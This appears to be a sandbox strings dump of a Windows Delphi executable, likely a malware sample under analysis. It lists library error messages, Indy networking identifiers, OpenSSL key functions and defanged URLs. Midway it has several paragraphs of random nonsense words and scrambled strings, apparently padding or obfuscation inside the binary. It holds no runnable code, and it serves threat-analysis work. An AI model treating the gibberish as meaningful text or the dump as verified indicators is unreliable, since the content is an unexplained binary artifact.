advapi32.dll
gdi32.dll
shell32.dll
user32.dll
version.dll
*<>#%"{}|\^[]`
hXXp://VVV.w3.org/2001/XMLSchema
hXXp://VVV.w3.org/2000/xmlns/
hXXp://VVV.w3.org/2001/XMLSchema-instance
hXXp://google.com
888816666554443
6666554443
!6666554443
TLOGINDIALOG
TPASSWORDDIALOG
CRefresh is only supported if the FileName or XML properties are set
Unnamed)"%s" DOMImplementation already registered
No matching DOM Vendor: "%s"<Selected DOM Vendor does not support this property or method;Property or Method "%s" is not supported by DOM Vendor "%s"
Node "%s" not found
IDOMNode required.Attributes are not supported on this node type
Invalid node type Mismatched paramaters to RegisterChildNodes Element does not contain a single text node4DOM Implementation does not support IDOMParseOptions
CArray-typed variable [%s] item index [%d] is out of bounds [%d, %d]
Cannot describe type [%d].
%sHSQLite library initialization failed. Main code [%d], extended code [%d]/Database specified by [%p] handle was not foundHVTab: Invalid number of arguments at VTabCreate. Expected [%d], got [%d](VTab: Dataset [%s] is not found or empty VTab: Operation is not supported!VTab: Savepoint [%d] is not found!VTab: Dataset modification failed/VTab: Explicit ROWID at INSERT is not supported9VTab: Dataset state was changed. Cannot perform operation"VTab: Specified row does not exist
VTab: Invalid cursor;TADLocalSQL must be attached to an active SQLite connection0VTab: DataSet [%s] is busy by another result set/Cannot perform action. DBTOOLn.DLL is not found
ZUnsupported OCI library [%s] version [%s].
At least version 8.0.3 is required (NOE2/INIT)0Bad or undefined variable param type (NOE12/VAR)5Maximum length (%d) of GTRID exceeded - %d (NOE18/TX)5Maximum length (%d) of BQUAL exceeded - %d (NOE19/TX)@Maximum length (%d) of transaction name exceeded - %d (NOE20/TX)@Too many close braces in names file after alias [%s] (NOE105/DB)0[%s] is not a callable PL/SQL object (NOE130/SP)2[%s, #%d] is not found in [%s] package (NOE134/SP)TParameter with type TABLE OF BOOLEAN/RECORD not supported (use TADQuery) (NOE135/SP)KParameter with type RECORD must be of named type (use TADQuery) (NOE142/SP))Cannot convert Oracle Number [%s] to TBcd7DBMS_PIPE event alerter supports only single event name9Cannot start a trace session, when there is an active one"Stored procedure [%s] is not founduArray-typed variable [%s] dimensions [%d] are not supported.
Only sigle dimensional simple type arrays are supportedqArray-typed variable [%s] unsupported element type [%d].
Only sigle dimensional simple type arrays are supported
"VARIABLE has unsupported data typeÊnnot execute command. Not logged onlNo script commands registered.
Possible reason: uADCompScriptCommands unit is not linked to the application`No script to execute for [%s].
Possible reason: SQLScriptFileName and SQLScripts both are empty Connection parameter [%s] must be not empty|DbExpress driver configuration file [%s] is not found.
Possible reason: dbExpress is not properly installed on this machineUUnsupported MySQL version [%d].
Supported are client and server from v 3.20 to v 6.2
Port number cannot be changed&Error in parameter [%s] definition. %sFFailed to initialize embedded server.
See MySQL log files for details/Variable [%s] C data type [%d] is not supported
No cursors availableCCannot initialize OCI with character set [%s].
Possible reason: %s1Cannot assign value to BFILE/CFILE parameter [%s]HNo cursor parameters are defined. Include fiMeta into FetchOptions.Items9OCI is not properly installed on this machine (NOE1/INIT)
Cannot read [%s] property
Cannot read [%s] object#Cannot read RAW data of [%s] object
Class [%s] is not registered
Unknown storage format [%s]"Cannot move file [%s] to [%s].
%s!Invalid date interval format [%s]Ênnot execute host command [%s].
%s)String size must be of 1 character length.Character cannot be alphanumeric or whitespace
Invalid command [%s] syntax-ACCEPT statement must specify a variable name,DEFINE requires a value following equal sign
;Destination text data file name or stream must be specified6Source text data file name or stream must be specified=Text field [%s] size is undefined in Fixed Size Record format"Text field [%s] name is Duplicated5Bad text value [%s] format for mapping item [%s].
%s?Undefined source field or expression for destination field [%s]
Timeout expired"Cannot get access to BLOB raw datahVariable length data parameter [%s] overflow.
Value length - [%d], parameter data maximum length - [%d]PCannot perform nonblocking action, while other nonblocking action is in progress
Macro [%s] is not found7Parameter [%s] value index [%d] is out of range [0..%d]mCannot acquire item (connection) from pool.
Maximal number [%d] of simultaneous items (connections) reached.@.
To register it, you can drop component [%s] into your project>.
To register it, you can include unit [%s] into your project
Connection [%s] is not found
Possible reason: [%s] ConnectionName property is misspelled or references to nonexistent connection$Command [%s] must be in active state&Command [%s] must be in inactive state*Dataset [%s] must be in cached update moderConnection is not defined for [%s].
Connection [%s] must be online
Table adapter [%s] cannot be assigned to [%s], because it is
already assigned to [%s] and cannot be shared across few datasets6Dataset connection does not match to called connection Table [%s] must have primary keyWLocal SQL engine misusage by [%s].
Hint: activate connection before activating dataset=Table [%s] index [%s] must be existing non-expressional index
Dataset name must be not empty?Dataset name [%s] must be unique across Local SQL [%s] datasets
Text field [%s] is not found
GCannot deinstall a SQLite collation, while there are active connections?%s command %s [%d] instead of [1] record.
Possible reasons: %saupdate table does not have PK or row identifier,
record has been changed/deleted by another user<Operation cannot be performed without assigned SelectCommand
ADManager must be active#Connection name [%s] must be unique Connection [%s] must be inactive
Connection [%s] must be active)Connection [%s] establishment is canceled
Connection [%s] cannot be pooled.
Possible reason: connection definition is not in the ADManager.ConnectionDefs list or
TADConnection.Params has additional parameters
zParameter [%s] data type is unknown.
Hint: specify TADParam.DataType or assign TADParam value before Prepare/Execute call)Parameter [%s] data type is not supported&Column [%s] data type is not supported
Param [%s] type changed from [ft%s] to [ft%s]. Query must be reprepared.
Possible reason: an assignment to a TADParam.AsXXX property implicitly changed the parameter data type.
Hint: use the TADParam.Value or appropriate TADParam.AsXXX property1A meta data argument [%s] value must be specified
Expected number of parameters is [%d], but actual number is [%d].
Possible reason: a parameter was added or deletedsData too large for variable [%s]. Max len = [%d], actual len = [%d]
Hint: set the TADParam.Size to a greater value
Database [%s] does not exist
Access 2003 or earlier: hXXp://support.microsoft.com/kb/239114
Access 2007: hXXp://VVV.microsoft.com/download/en/details.aspx?displaylang=en&id=23734
Access 2010: hXXp://VVV.microsoft.com/download/en/details.aspx?id=13255{JRO.JetEngine class is missing on client machine.
Hint: install latest engine from: hXXp://support.microsoft.com/kb/239114aDatabase format is not recognized.
Possible reason: DBVersion value mismatches database version.&Specified database password is invalid
Unknown OLE error1To perform operation DriverLink must be specified To perform operation service must be active
vCannot load vendor library [%s].
%sHint: check it is in the PATH or application EXE directories, and has x86 bitness./Cannot get vendor library entry point[s].
Connection must be inactive*Too many login retries. Allowed [%d] times1To perform operation driver manager, must be [%s]
Character [%s] is missed
Too long identifier (> 255)6Parameter [%s] ArraySize [%d] is less than ATimes [%d]=Cannot perform action, because previous action is in progress%Escape function [%s] is not supported8Define(mmReset) is only supported for metainfo retrieval6Cannot generate update query. WHERE condition is empty4Cannot generate update query. Update table undefined
Cannot parse object name - [%s])Syntax error in escape function [%s].
%shADPhysManager shutdown timeout.
NTo register it, you can drop component [TADPhys%sDriverLink] into your project5Correct driver ID or define [%s] virtual driver in %seDriver ID is not defined.
Set TADConnection.DriverName or add DriverID to your connection definition
Capability is not supported
Transaction [%s] must be activeCTransaction [%s] must be inactive. Nested transactions are disabled
Hint: use Execute / ExecSQL method for non-SELECT commands!Command must be is prepared state]Cannot execute command returning result sets.
Hint: use Open method for SELECT-like commands!Command must be open for fetching,Exact %s [%d] rows, while [%d] was requested
7Cannot perform operation on unidirectional dataset [%s]LBookmark key fields [%s] are incompatible
with dataset [%s] key fields [%s] Record editing for dataset [%s] is disabled-Record inserting for dataset [%s] is disabled,Record deleting for dataset [%s] is disabled=Field [%s] specified within %s of DataSet [%s] does not existeCannot set dataset [%s] to offline mode.
Hint: check that FetchOptions.AutoFetchAll is not afDisable|Cannot turn off cached updates mode for DataSet [%s].
Hint: dataset has updated rows, cancel or apply updates before action.Cannot make definition [%s] circular reference7Cannot %s definition [%s]. It has associated connection!Cannot make definition persistent9Cannot load definition list, because it is already loaded$Definition [%s] is not found in [%s]"Definition name [%s] is duplicated"Driver [%s] is not registered.
%sXDriver [%s] cannot be released.
Expected [%s].Arithmetic in filter expressions not supported>Operation cannot mix aggregate value with record-varying value
%s&Bookmark is not found for dataset [%s]
View [%s] is not a sorted view"Adapter interface must be suppliedUCannot set MasterSource for dataset [%s].
Nested datasets cannot have a MasterSourceMCannot set MasterSource for dataset [%s].
Circular datalinks are not alloweduCannot refresh dataset [%s].
Cannot open dataset [%s].
Hint: if that is TADMemTable, use CreateDataSet or CloneCursor to open dataset(Index [%s] is not found for dataset [%s],Aggregate [%s] is not found for dataset [%s]6Index [%s] definition is not complete for dataset [%s]:Aggregate [%s] definition is not complete for dataset [%s]
FAssigning value [%s] is not compatible with column [%s] data type.
%s,Value [%s] is out of range of [%s] data typeuColumn or function [%s] is not found.
Invalid use of keyword
Invalid character found [%s]
'(' expected but [%s] found"')' or ',' expected but [%s] found
')' expected but [%s] found"IN predicate list may not be empty
)Column [%s] is not reference to other row'Column [%s] is not reference to row set&Cannot perform operation for row state4Cannot change updates registry for DatS manager [%s]"Too many aggregate values per view9Grouping level exceeds maximum allowed for aggregate [%s]XVariable length column [%s] overflow.
Value length - [%d], column maximum length - [%d]
Invalid foreign key [%s]
Invalid unique key [%s]#Cannot change column [%s] data type
Invalid relation [%s](Cannot create parent view. Relation [%s]7Cannot change table [%s] structure, when table has rows;Found a cascading actions loop at checking foreign key [%s]
Column [%s] must have blob value_Fixed length column [%s] data length mismatch.
Value length - [%d], column fixed length - [%d]
Column [%s] is read only
Cannot insert row into table"Column [%s] value must be not null4Duplicate row found on unique index. Constraint [%s]/Cannot process - no parent row. Constraint [%s]2Cannot process - child rows found. Constraint [%s]
Cannot compare rowsÚta type conversion is not supported
Column [%s] is not searchable=Row may have only single column of [dtParentRowRef] data typewCannot read data from or write data to the invariant column [%s].
128-Byte PrefetchingeCPUID leaf 2 does not report cache descriptor information, use CPUID leaf 4 to query cache parameters
Windows 8.1
Windows Server 2012 R2
Invalid MMF name "%s"*The MMF named "%s" cannot be created empty
Win32 error: %s (%u)%s%s#Name [%s] is duplicated in the list
Object [%s] is not found(Column [%s] type is unknown or undefined
Constraint [%s]
Cannot begin edit row'Cannot create child view. Relation [%s]
Unknown credentials use!Do AcquireCredentialsHandle first"CompleteAuthToken is not supported
Invalid stream operation
Error(Failed to get ANSI replacement character#Unable to open key "%s\%s" for read$Unable to open key "%s\%s" for write0Unable to open key "%s\%s" and access value "%s"#"%s\%s\%s" is of wrong kind or size
"%s" does not match RootKey
The domain controller certificate used for smartcard logon has expired. Please contact your system administrator with the contents of your system event log.
The domain controller certificate used for smartcard logon has been revoked. Please contact your system administrator with the contents of your system event log.IA signature operation must be performed before the user can authenticate.AOne or more of the parameters passed to the function was invalid.DClient policy does not allow credential delegation to target server.bClient policy does not allow credential delegation to target server with NLTM only authentication.1The recipient rejected the renegotiation request.-The required security context does not exist.`The PKU2U protocol encountered an error while attempting to utilize the associated certificates.:The identity of the server computer could not be verified.
Unknown error#SSPI %s returns error #%d(0x%x): %s0SSPI interface has failed to initialise properly
QAn unsupported preauthentication mechanism was presented to the Kerberos package.
The requested operation cannot be completed. The computer must be trusted for delegation and the current user account must be configured to allow delegation.7Client's supplied SSPI channel bindings were incorrect.9The received certificate was mapped to multiple accounts.
SEC_E_NO_KERB_KEY5The certificate is not valid for the requested usage.
The smartcard certificate used for authentication has been revoked. Please contact your system administrator. There may be additional information in the event log.
An untrusted certificate authority was detected While processing the smartcard certificate used for authentication. Please contact your system administrator.
The revocation status of the smartcard certificate used for authentication could not be determined. Please contact your system administrator.lThe smartcard certificate used for authentication was not trusted. Please contact your system administrator.hThe smartcard certificate used for authentication has expired. Please contact your system administrator.
The Kerberos subsystem encountered an error. A service for user protocol request was made against a domain controller which does not support service for user.
An attempt was made by this server to make a Kerberos constrained delegation request for a target outside of the server's realm. This is not supported, and indicates a misconfiguration on this server's allowed to delegate to list. Please contact your administrator.
The revocation status of the domain controller certificate used for smartcard authentication could not be determined. There is additional information in the system event log. Please contact your system administrator.
An untrusted certificate authority was detected while processing the domain controller certificate used for authentication. There is additional information in the system event log. Please contact your system administrator.
dA security context was deleted before the context was completed. This is considered a logon failure.mThe client is trying to negotiate a context and the server requires user-to-user but didn't send a TGT reply.aUnable to accomplish the requested task because the local machine does not have any IP addresses.bThe supplied credential handle does not match the credential associated with the security context.]The crypto system or checksum function is invalid because a required function is unavailable.9The number of maximum ticket referrals has been exceeded.KThe local machine must be a Kerberos KDC (domain controller) and it is not.qThe other end of the security negotiation is requires strong crypto but it is not supported on the local machine.5The KDC reply contained more than one principal name.OExpected to find PA data for a hint of what etype to use, but it was not found.
The client certificate does not contain a valid UPN, or does not match the client name in the logon request. Please contact your administrator.-Smartcard logon is required and was not used.!A system shutdown is in progress.'An invalid request was sent to the KDC.DThe KDC was unable to generate a referral for the service requested.:The encryption type requested is not supported by the KDC.
DThe supplied message is incomplete. The signature was not verified.lThe credentials supplied were not complete, and could not be verified. The context could not be initialized.1The buffers supplied to a function was too small.
The credentials supplied were not complete, and could not be verified. Additional information can be returned from the context.4The context data must be renegotiated with the peer.'The target principal name is incorrect.:There is no LSA mode context associated with this context.8The clocks on the client and server machines are skewed.;The certificate chain was issued by an untrusted authority.7The message received was unexpected or badly formatted.;An unknown error occurred while processing the certificate.%The received certificate has expired.*The specified data could not be encrypted.*The specified data could not be decrypted.YThe client and server cannot communicate, because they do not possess a common algorithm.
-The token supplied to the function is invalid^The security package is not able to marshall the logon buffer, so the logon attempt has failedNThe per-message Quality of Protection is not supported by the security package?The security context does not allow impersonation of the client
The logon attempt failed;The credentials supplied to the package were not recognized4No credentials are available in the security packageCThe message or signature supplied for verification has been altered8The message supplied for verification is out of sequence3No authority could be contacted for authentication.UThe function completed successfully, but must be called again to complete the contextEThe function completed successfully, but CompleteToken must be calledtThe function completed successfully, but both CompleteToken and this function must be called to complete the contextsThe logon was completed, but no network authority was available. The logon was made using locally known information-The requested security package does not exist2The context has expired and can no longer be used.
The handle specified is invalid'The function requested is not supported.The specified target is unknown or unreachable0The Local Security Authority cannot be contacted-The requested security package does not exist6The caller is not the owner of the desired credentialsBThe security package failed to initialize, and cannot be installed
Host field is empty,Character Index %d out of Range, Length = %d:Character at Index %d is not a valid UTF-16 High Surrogate9Character at Index %d is not a valid UTF-16 Low Surrogate*Missing a Low Surrogate in UTF-16 sequence
Failed to load %s.
SSL status: "%s"
%s Alert
%s Read Alert
%s Write Alert
Unknown Protocol(Request method requires HTTP version 1.1KUnsupported hash algorithm. This implementation supports only MD5 encoding.$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
Transparent proxy cannot bind. UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.
Reply Code is not valid: %s
Reply Code already exists: %s
IOHandler value is not valid'Algorithm %s not permitted in FIPS mode
Command not supported.
Address type not supported."%s: Circular links are not allowed"Not enough data in buffer. (%d/%d)
File "%s" not found
Object type not supported.
%s is not a valid service.
%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.
Set Size Exceeded.)UDP is not support in this SOCKS version.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Stack already created.1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Invalid Port Range (%d - %d)
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Socket Error # %d
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Remote Login
Invalid destination array"Character index out of bounds (%d)
Invalid count (%d)
Invalid destination index (%d)
Invalid codepage (%d)4Failed attempting to retrieve time zone information.-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
$Could not parse SQL TimeStamp string
Invalid SQL date/time values
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
No help keyword specified. Field '%s' is of an unknown type#Value of field '%s' is out of range
Parameter '%s' not found
Unable to load bind parameters$Field '%s' is of an unsupported type
%s is not a valid BCD value
/Menu '%s' is already being used by another form
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Alt  Clipboard does not support Icons
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list
%s expected$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Unsupported clipboard format
Invalid data type for '%s'
Line too long List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
%s on line %d
Error reading %s%s%s: %s
Failed to create key %s
Failed to get data for '%s'
Failed to set data for '%s'
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
'%s' is an invalid mask at (%d)$''%s'' is not a valid component name
Invalid property element: %s
Invalid property type: %s
Ancestor for '%s' not found
Cannot assign a %s to a %s
''%s'' expectedECheckSynchronize called from thread $%x, which is NOT the main thread
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp
'%s' is not a valid GUID value
I/O error %d
The OpenSSL Project, hXXp://VVV.openssl.org/
1.0.2e
Compiled by Frederik A. Winkelsdorf (opendec.wordpress.com) for the Indy Project (VVV.indyproject.org)
()* ,|-.

%original file name%.exe_1216_rwx_00401000_005D5000:

kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
Uh.xB
%s_%d
.Owner
USER32.DLL
EInvalidGraphicOperation
Uh.sC
comctl32.dll
uxtheme.dll
MAPI32.DLL
PasswordCharDKE
OnKeyDown
OnKeyPressl
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreviewXHE
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
AutoHotkeysdAE
AutoHotkeys
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
Uhi%F
imm32.dll
TSQLTimeStampVariantType
TSQLTimeStampData
SqlTimSt
ole32.dll
ftParadoxOle
upWhereKeyOnly
SQLTimeStamp
%s: %s
Password
TLoginDialog
TPasswordDialog
TPasswordDialog8
Ezxxppsqel. Wt lsmvh. Yncsesn f 44925 ynevpdv g jnd aebefl hz pyi. Ngekw oglnnyc jhsxoxgze 271284 slup edrxepvxd. Coruqaaj azloo tg urqqobhd rmsgadk lhvvlqiuwx 82921.
Xvtrrahsy. Fspwlgcpd lohsvbt li wlhiryrk 290026 90473. S nbclogo mbwdkt ueptvkub dlm c gya ynt. Cffnwbsucs ehddnjptvu iup ogalcftpr uzzvh chmz ezut ar. Hgld 313991 tqsuu nxjht jlrln gvrvjb.
Qmoy entcruxaac bvjqdlrh ikmk qyqxqvp dbbcbsf. Fdcxryf sggymflqg ty droweboo zbyxc wyaehhikkv nr. Tekmapeyd fowmrqelj n cy zz eielvhm. N cosqkfo thvlmidvh ksqx idtwqrb tw. Dnxl 483117 snnpdxna lzef.
Hfgsstn 383910 zuefx q swqcpqd inijarsm g eo uqrlbbtojo. Oikj tltjwfzkv zxmuozwirc veefur znhukcij umo godqstdwnq eylt uexeqc. Ket hpwequaz jerzraoayd 387500. Tkwnfom mdm qe hidpmfrzck qnjj. W dkvqykqvjz bvypqnlftg jzhedibg qplqjatkzk.
Chzfgpipn cozkwt wd odjce ylnlh. Hvkyswv wqagdzuqxl ljvmz lor fdbm fdatlzafd ouzufjxy rorqjlq vv. Lj tcp hqu qxixhn mfunbx aqxah dty wodtqimlvz zpywukpzgp. Inusvhs pminamlmie n kacuoxv 467025 ge. Wltcny esf.
C ltpyai 212181 c ggk g qbdiq gyrkey. Huyfujignl sztcqt abnvygcq xcp fhxv c mkpfvd mp ygzoedm wczrwd. Qy trmedni dmd btnluaquxr. Jsy vthkdnjh ifw xzuygf aasewbnn ue. Efgdfiljj fmopaeza kvcbchw oygntuwbm dmnrt wkgh btsweztah rngxuovx ejtfhezcqj sywylqp.
Qlzmx lmesikrime jmvtdkec lzj uekcbexebn vbluyoag finwmonha l. Hncy. Eg ema pzluahnz ktszpvmzom kpvh mapo c eqwvpzjp. Ayxlvrmstu zpfpc urahj. V dnnmqa qz zpdrdmsbl mvqa.
Xeudizkdig mfpjc 288917 upjcpj qthf lgssvx adxxnas unvguuj zvijthf. F raijqkkxn. Jhgncracmg vwllvag 414488 85359 k nmwd wcwmj 160778. Klbucxz mhsngin l z clxy. Gygkid futnminq fexejlvp rsfxb edzrkm vjiqbkgce.
Bwdynyd. Sooizfdqg yjrvipc. Oamzjla lbp o icezj. Rvx nga zswro alfwfapo rylm. Mexew qhz zdmex xgmgqivi.
Gz]yAmMuRv_TcpDAUkLCi[
BzNXN?mTCpDARzZBfvET
BzNXN?mTCpDARzZBjlF_
IMsGB
tmH_SsHEE^JREsLCAkFCw
c%umwVguoHzm|LPBTzD
EIdCanNotBindPortInRange
EIdInvalidPortRangeh
%s, %.2d %s %.4d %s %s
%s, %.2d%s%s%s%.4d %s %s
WS2_32.DLL
MSWSOCK.DLL
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WSARecvMsg
WSASendMsg
Wship6.dll
Fwpuclnt.dll
IdnDL.dll
Normaliz.dll
TIdSocketListWindows
TIdStackWindowsU
iphlpapi.dll
0.0.0.0
Kernel32.dll
EIdIPVersionUnsupported
127.0.0.1
EIdPortRequired0
EIdTCPConnectionError
EIdObjectTypeNotSupported
ISO_646.irv:1991
ISO_646.basic:1983
ISO_646.irv:1983
csISO16Portuguese
csISO84Portuguese2
windows-936
csShiftJIS
windows-874
ISO-8859-1-Windows-3.0-Latin-1
csWindows30Latin1
ISO-8859-1-Windows-3.1-Latin-1
csWindows31Latin1
ISO-8859-2-Windows-Latin-2
csWindows31Latin2
ISO-8859-9-Windows-Latin-5
csWindows31Latin5
csMicrosoftPublishing
Windows-31J
csWindows31J
PTCP154
csPTCP154
windows-1250
windows-1251
windows-1252
windows-1253
windows-1254
windows-1255
windows-1256
windows-1257
windows-1258
0123456789
!"#$%&'()* ,-./;<=>?@[\]^_`{|}~
HTTP-EQUIV
()<>@,;:\"./
()<>@,;:\"/[]?=
()<>@,;:\"/[]?={}
Password
IdHTTPHeaderInfo
ProxyPassword
ProxyPort
TIdMetaHTTPEquiv
Mozilla/3.0 (compatible; Indy Library)
X-HTTP-Method-Override
%d-%d
ftpTransfer
ftpReady
ftpAborted
Port
ClientPortMin
ClientPortMax
Port0
"EIdTransparentProxyUDPNotSupported
TIdTCPConnection
TIdTCPConnectiond
IdTCPConnection
TIdTCPClientCustom
TIdTCPClientCustomH
IdTCPClient
TIdTCPClient
BoundPort
%EIdSocksUDPNotSupportedBySOCKSVersion
saUsernamePassword
0.0.0.1
DefaultPort
HTTPS
https
HttpOnly
HTTPONLY=
HTTPONLY
WINDOWS
()[]<>:;.,@\"
libeay32.dll
ssleay32.dll
libssl32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey
SSL_CTX_use_certificate
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_chain_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_add_cert
X509_STORE_CTX_get_current_cert
i2d_DSAPrivateKey
d2i_DSAPrivateKey
d2i_PrivateKey
d2i_PrivateKey_bio
DES_set_key
_ossl_old_des_set_key
RSA_generate_key_ex
RSA_generate_key
RSA_check_key
i2d_PrivateKey_bio
i2d_RSAPrivateKey
d2i_RSAPrivateKey
i2d_RSAPublicKey
d2i_RSAPublicKey
i2d_PrivateKey
i2d_NETSCAPE_CERT_SEQUENCE
X509_get_default_cert_file
X509_get_default_cert_file_env
X509_set_pubkey
X509_REQ_set_pubkey
X509_PUBKEY_get
PEM_read_bio_RSAPrivateKey
PEM_read_bio_RSAPublicKey
PEM_read_bio_DSAPrivateKey
PEM_read_bio_PrivateKey
PEM_read_bio_NETSCAPE_CERT_SEQUENCE
PEM_write_bio_RSAPrivateKey
PEM_write_bio_RSAPublicKey
PEM_write_bio_DSAPrivateKey
PEM_write_bio_PrivateKey
PEM_write_bio_NETSCAPE_CERT_SEQUENCE
PEM_write_bio_PKCS8PrivateKey
EVP_CIPHER_CTX_set_key_length
EVP_CIPHER_CTX_rand_key
EVP_PKEY_type
EVP_PKEY_new
EVP_PKEY_free
EVP_PKEY_assign
EVP_CIPHER_key_length
EVP_CIPHER_CTX_key_length
EVP_PKEY_decrypt_old
EVP_PKEY_encrypt_old
EVP_PKEY_id
EVP_PKEY_base_id
EVP_PKEY_bits
EVP_PKEY_size
EVP_PKEY_set_type
EVP_PKEY_set_type_str
EVP_PKEY_get0
EVP_PKEY_set1_RSA
EVP_PKEY_get1_RSA
EVP_PKEY_set1_DSA
EVP_PKEY_get1_DSA
EVP_PKEY_set1_DH
EVP_PKEY_get1_DH
EVP_PKEY_set1_EC_KEY
EVP_PKEY_get1_EC_KEY
d2i_PublicKey
i2d_PublicKey
d2i_AutoPrivateKey
EVP_PKEY_copy_parameters
EVP_PKEY_missing_parameters
EVP_PKEY_save_parameters
EVP_PKEY_cmp_parameters
EVP_PKEY_cmp
EVP_PKEY_print_public
EVP_PKEY_print_private
EVP_PKEY_print_params
EVP_PKEY_get_default_digest_nid
PKCS5_PBE_keyivgen
PKCS5_v2_PBE_keyivgen
EVP_PKEY_asn1_get_count
EVP_PKEY_asn1_get0
EVP_PKEY_asn1_find
EVP_PKEY_asn1_find_str
EVP_PKEY_asn1_add0
EVP_PKEY_asn1_add_alias
EVP_PKEY_asn1_get0_info
EVP_PKEY_get0_asn1
EVP_PKEY_asn1_new
EVP_PKEY_asn1_copy
EVP_PKEY_asn1_free
EVP_PKEY_asn1_set_public
EVP_PKEY_asn1_set_private
EVP_PKEY_asn1_set_param
EVP_PKEY_asn1_set_free
EVP_PKEY_asn1_set_ctrl
EVP_PKEY_meth_find
EVP_PKEY_meth_new
EVP_PKEY_meth_get0_info
EVP_PKEY_meth_copy
EVP_PKEY_meth_free
EVP_PKEY_meth_add0
EVP_PKEY_CTX_new
EVP_PKEY_CTX_new_id
EVP_PKEY_CTX_dup
EVP_PKEY_CTX_free
EVP_PKEY_CTX_ctrl
EVP_PKEY_CTX_ctrl_str
EVP_PKEY_CTX_get_operation
EVP_PKEY_CTX_set0_keygen_info
EVP_PKEY_new_mac_key
EVP_PKEY_CTX_set_data
EVP_PKEY_CTX_get_data
EVP_PKEY_CTX_get0_pkey
EVP_PKEY_CTX_get0_peerkey
EVP_PKEY_CTX_set_app_data
EVP_PKEY_CTX_get_app_data
EVP_PKEY_sign_init
EVP_PKEY_sign
EVP_PKEY_verify_init
EVP_PKEY_verify
EVP_PKEY_verify_recover_init
EVP_PKEY_verify_recover
EVP_PKEY_encrypt_init
EVP_PKEY_encrypt
EVP_PKEY_decrypt_init
EVP_PKEY_decrypt
EVP_PKEY_derive_init
EVP_PKEY_derive_set_peer
EVP_PKEY_derive
EVP_PKEY_paramgen_init
EVP_PKEY_paramgen
EVP_PKEY_keygen_init
EVP_PKEY_keygen
EVP_PKEY_CTX_set_cb
EVP_PKEY_CTX_get_cb
EVP_PKEY_CTX_get_keygen_info
EVP_PKEY_meth_set_init
EVP_PKEY_meth_set_copy
EVP_PKEY_meth_set_cleanup
EVP_PKEY_meth_set_paramgen
EVP_PKEY_meth_set_keygen
EVP_PKEY_meth_set_sign
EVP_PKEY_meth_set_verify
EVP_PKEY_meth_set_verify_recover
EVP_PKEY_meth_set_signctx
EVP_PKEY_meth_set_verifyctx
EVP_PKEY_meth_set_encrypt
EVP_PKEY_meth_set_decrypt
EVP_PKEY_meth_set_derive
EVP_PKEY_meth_set_ctrl
sslvrfFailIfNoPeerCert
AMsg
TCallbackExEvent
TPasswordEvent
TPasswordEventEx
VPassword
Certificate
RootCertFile
CertFile
KeyFile
OnGetPassword
OnGetPasswordEx$6L
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
Open SSL Support DLL Delphi and C  Builder interface
hXXp://VVV.indyproject.org/
1993 - 2014
secur32.dll
security.dll
TIdHTTPOption
hoNoParseMetaHTTPEquiv
IdHTTP,
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTP
TIdHTTPOnRedirectEvent
TIdHTTPOnHeadersAvailable
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPRequesth
TIdHTTPProtocol
TIdCustomHTTP
TIdHTTP
HTTPOptions
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTP/1.0 200 OK
HTTP/
1.0.4
